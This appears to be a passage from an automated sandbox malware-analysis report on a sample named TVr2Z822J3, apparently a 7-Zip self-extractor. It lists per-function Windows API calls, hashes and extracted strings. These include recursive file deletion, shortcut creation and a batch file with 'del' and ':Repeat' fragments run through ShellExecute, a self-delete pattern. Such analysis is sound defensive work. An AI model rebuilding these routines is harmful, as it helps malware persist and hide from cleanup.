                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1033339047-0
                                                                                                                  • Opcode ID: a7abc97568459436273e1f083447e626332fd1c69ee6784c82a7404474e7416c
                                                                                                                  • Instruction ID: 194059228ff5733793a196764ebf5a0b63d959e09992ce12dff2d54d27d13516
                                                                                                                  • Opcode Fuzzy Hash: a7abc97568459436273e1f083447e626332fd1c69ee6784c82a7404474e7416c
                                                                                                                  • Instruction Fuzzy Hash: 67D0A9313083121ADA5432320A09AAF84848B503A0F10083FB800A32D1DCBE8C81A299
                                                                                                                  APIs
                                                                                                                  • CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseHandle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2962429428-0
                                                                                                                  • Opcode ID: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
                                                                                                                  • Instruction ID: 71cfb53d0268b44c797f7400575dcc0518408263689e7c465582b3111ebcfb94
                                                                                                                  • Opcode Fuzzy Hash: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
                                                                                                                  • Instruction Fuzzy Hash: 95D0127251422156CF646E7CB8849C277D85A06334335176AF0B4E32E4D3749DCB5698
                                                                                                                  APIs
                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,0040E4D6,00020000,00000000,?,00000000,?,0040D92B,?,?,00000000,?,0040D96E), ref: 004024E0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4275171209-0
                                                                                                                  • Opcode ID: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
                                                                                                                  • Instruction ID: 23ad038ad5ccaf642d49e1102795c1c714580f299e31bec6e074b0e2bc220d86
                                                                                                                  • Opcode Fuzzy Hash: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
                                                                                                                  • Instruction Fuzzy Hash: D3C080301443007DED115F505E06B463A916B44717F508065F344540D0C7F484009509
                                                                                                                  APIs
                                                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,0040E561,?,00000004,0040E5B0,?,?,004117E5,?), ref: 00401B2A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1263568516-0
                                                                                                                  • Opcode ID: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
                                                                                                                  • Instruction ID: 5381ed20748db0b7fd93371e38984c83fa4171db9cf80dc6a42123bab5888d64
                                                                                                                  • Opcode Fuzzy Hash: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
                                                                                                                  • Instruction Fuzzy Hash: 45A002305446007ADE515B10DD05F457F516744B11F20C5547155540E586755654DA09
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1294909896-0
                                                                                                                  • Opcode ID: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
                                                                                                                  • Instruction ID: 7baee4be7330d58fba6a4d3e6254b3dabd4481adb37f3967e502ba2394f26960
                                                                                                                  • Opcode Fuzzy Hash: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                  APIs
                                                                                                                  • _wtol.MSVCRT ref: 004034E5
                                                                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,CC5BE863,00000000,004177A0,00000000,00417794), ref: 00403588
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 004035F9
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 00403601
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00403609
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 00403611
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 00403619
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00403621
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403629
                                                                                                                  • _wtol.MSVCRT ref: 0040367F
                                                                                                                  • CoCreateInstance.OLE32(00414BF4,00000000,00000001,00414BE4,00404F9B,.lnk,?,0000005C), ref: 00403720
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 004037B8
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 004037C0
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 004037C8
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 004037D0
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 004037D8
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 004037E0
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 004037E8
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 004037EE
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 004037F6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
                                                                                                                  • String ID: .lnk
                                                                                                                  • API String ID: 408529070-24824748
                                                                                                                  • Opcode ID: cb1a116a375c0276f3cc47ebae34f017b071fc5c88c5a353f484599fe5934efa
                                                                                                                  • Instruction ID: c4a1d47ac56633071a1bd2db01059e5edb54ffe0bccc65637149caefe5d2277b
                                                                                                                  • Opcode Fuzzy Hash: cb1a116a375c0276f3cc47ebae34f017b071fc5c88c5a353f484599fe5934efa
                                                                                                                  • Instruction Fuzzy Hash: 8EA18A71910219ABDF04EFA1CC46DEEBB79EF44705F50442AF502B71A1EB79AA81CB18
                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                                                                                                  • wsprintfW.USER32 ref: 00401FFD
                                                                                                                  • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                                                                                                  • GetLastError.KERNEL32 ref: 00402017
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                                                                                                  • GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                                                                                                  • GetLastError.KERNEL32 ref: 0040204C
                                                                                                                  • lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00402098
                                                                                                                  • lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                                                                                                  • _wtol.MSVCRT ref: 0040212A
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
                                                                                                                  • String ID: 7zSfxString%d$XpA$\3A
                                                                                                                  • API String ID: 2117570002-3108448011
                                                                                                                  • Opcode ID: 548ade176c921e3c89d1731ce67e310a71d7e7a73203bdbbb6ff14cd1b9bb65a
                                                                                                                  • Instruction ID: 5c0681f152172bce6659d4e02be164ba9bb36eab7c70e8d4f1a0ed4420d73572
                                                                                                                  • Opcode Fuzzy Hash: 548ade176c921e3c89d1731ce67e310a71d7e7a73203bdbbb6ff14cd1b9bb65a
                                                                                                                  • Instruction Fuzzy Hash: 11518471604305AFDB209F74DD899DBBBB9EB08345B11407AF646E62E0E774AA44CB18
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
                                                                                                                  • FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
                                                                                                                  • FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
                                                                                                                  • SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
                                                                                                                  • LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
                                                                                                                  • LockResource.KERNEL32(00000000), ref: 00401C41
                                                                                                                  • LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 00401C6D
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00401C76
                                                                                                                  • wsprintfW.USER32 ref: 00401C95
                                                                                                                  • LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 00401CAA
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00401CAD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
                                                                                                                  • String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
                                                                                                                  • API String ID: 2639302590-365843014
                                                                                                                  • Opcode ID: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
                                                                                                                  • Instruction ID: 1b367ad183524107b1556f539f271e2bfa11f4d2ebd4ebc35158efee647c5c94
                                                                                                                  • Opcode Fuzzy Hash: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
                                                                                                                  • Instruction Fuzzy Hash: 002153B1944318BBDB109FA59D48F9B7FBCEB48751F118036FA05B72D1D678DA008BA8
                                                                                                                  APIs
                                                                                                                  • wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                                                                                                  • GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                                                                                                  • FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                                                                                                  • FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                                                                                                  • lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                                                                                                  • lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                                                                                                  • lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                                                                                                  • lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                                                                                                  • LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 829399097-0
                                                                                                                  • Opcode ID: a8862aa27d5a6cc2b1ba12d709e13e5df444902fd3bed4afc67f02113c073308
                                                                                                                  • Instruction ID: 98041b7e574f1f1c61a73cce3db0a13ad597614178cae5aaf21d0c5f67190c53
                                                                                                                  • Opcode Fuzzy Hash: a8862aa27d5a6cc2b1ba12d709e13e5df444902fd3bed4afc67f02113c073308
                                                                                                                  • Instruction Fuzzy Hash: 85218172804209BEDF14AFA0DC85CEB7BACEB04355B10847BF506A7150EB34EE848BA4
                                                                                                                  APIs
                                                                                                                  • FindFirstFileW.KERNEL32(?,?,00413454,?,?,?,00000000), ref: 00402BA8
                                                                                                                  • lstrcmpW.KERNEL32(?,00413450,?,0000005C,?,?,?,00000000), ref: 00402BFB
                                                                                                                  • lstrcmpW.KERNEL32(?,00413448,?,?,00000000), ref: 00402C11
                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 00402C27
                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00402C2E
                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 00402C40
                                                                                                                  • FindClose.KERNEL32(00000000,?,?,00000000), ref: 00402C4F
                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 00402C5A
                                                                                                                  • RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 00402C63
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C6E
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C79
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1862581289-0
                                                                                                                  • Opcode ID: 3adc14f40e23b1cdad4e4199877390cf68653eec517b691feb080405b1435fa2
                                                                                                                  • Instruction ID: 7ffcf375551190f92b7aba4ef5ef3cd4ed0286f9dec59b0789af02bc25bdcc12
                                                                                                                  • Opcode Fuzzy Hash: 3adc14f40e23b1cdad4e4199877390cf68653eec517b691feb080405b1435fa2
                                                                                                                  • Instruction Fuzzy Hash: A321A230500209BAEB10AF61DE4CFBF7B7C9B0470AF14417AB505B11E0EB78DB459A6C
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(uxtheme,?,00407F57,000004B1,00000000,?,?,?,?,?,0040803E), ref: 00406D65
                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00406D76
                                                                                                                  • GetWindow.USER32(?,00000005), ref: 00406D8F
                                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 00406DA5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$AddressLibraryLoadProc
                                                                                                                  • String ID: SetWindowTheme$\EA$uxtheme
                                                                                                                  • API String ID: 324724604-1613512829
                                                                                                                  • Opcode ID: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
                                                                                                                  • Instruction ID: f2e0bdee1e376373ef12be0a37c87caa708c4cf78f5ebad58458586032015049
                                                                                                                  • Opcode Fuzzy Hash: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
                                                                                                                  • Instruction Fuzzy Hash: 47F0A73274172537C6312A6A6C4CF9B6B9C9FC6B51B070176B905F7280DA6CCD0045BC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
                                                                                                                  • Instruction ID: 2cf66fefa79674a345482580870fbecf2b771b639b37e27eb1fc897e4fc9b441
                                                                                                                  • Opcode Fuzzy Hash: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
                                                                                                                  • Instruction Fuzzy Hash: 44126E31E00129DFDF08CF68C6945ECBBB2EF85345F2585AAD856AB280D6749EC1DF84
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
                                                                                                                  • Instruction ID: 8743f1180a29be23716da9caa70fae7f7856ace610ba4dfa2102d12747f13ae8
                                                                                                                  • Opcode Fuzzy Hash: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
                                                                                                                  • Instruction Fuzzy Hash: D12129725104255BC711DF1DE8887B7B3E1FFC4319F678A36DA81CB281C629D894C6A0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                                                                                  • Instruction ID: 7cc7f0f00d3fdf34bc0739e2af2c3edfb6ca911da6c9eaecf720caf4c907201e
                                                                                                                  • Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                                                                                  • Instruction Fuzzy Hash: 0621F53290062587CB12CE6EE4845A7F392FBC436AF134727EE84A3291C62CA855C6A0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
                                                                                                                  • Instruction ID: 0032c0c3dd355d3b1328166acc4be040b7821e5e83bc1fe28c274bced218c28f
                                                                                                                  • Opcode Fuzzy Hash: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
                                                                                                                  • Instruction Fuzzy Hash: 4EF074B5A05209EFCB09CFA9C49199EFBF5FF48304B1084A9E819E7350E731AA11CF50
                                                                                                                  APIs
                                                                                                                  • GetDriveTypeW.KERNEL32(?,?,?), ref: 00404B46
                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404B77
                                                                                                                  • WriteFile.KERNEL32(004177C4,?,?,00406437,00000000,del ",:Repeat,00000000), ref: 00404C2C
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C37
                                                                                                                  • CloseHandle.KERNEL32(004177C4), ref: 00404C40
                                                                                                                  • SetFileAttributesW.KERNEL32(00406437,00000000), ref: 00404C57
                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00404C69
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C72
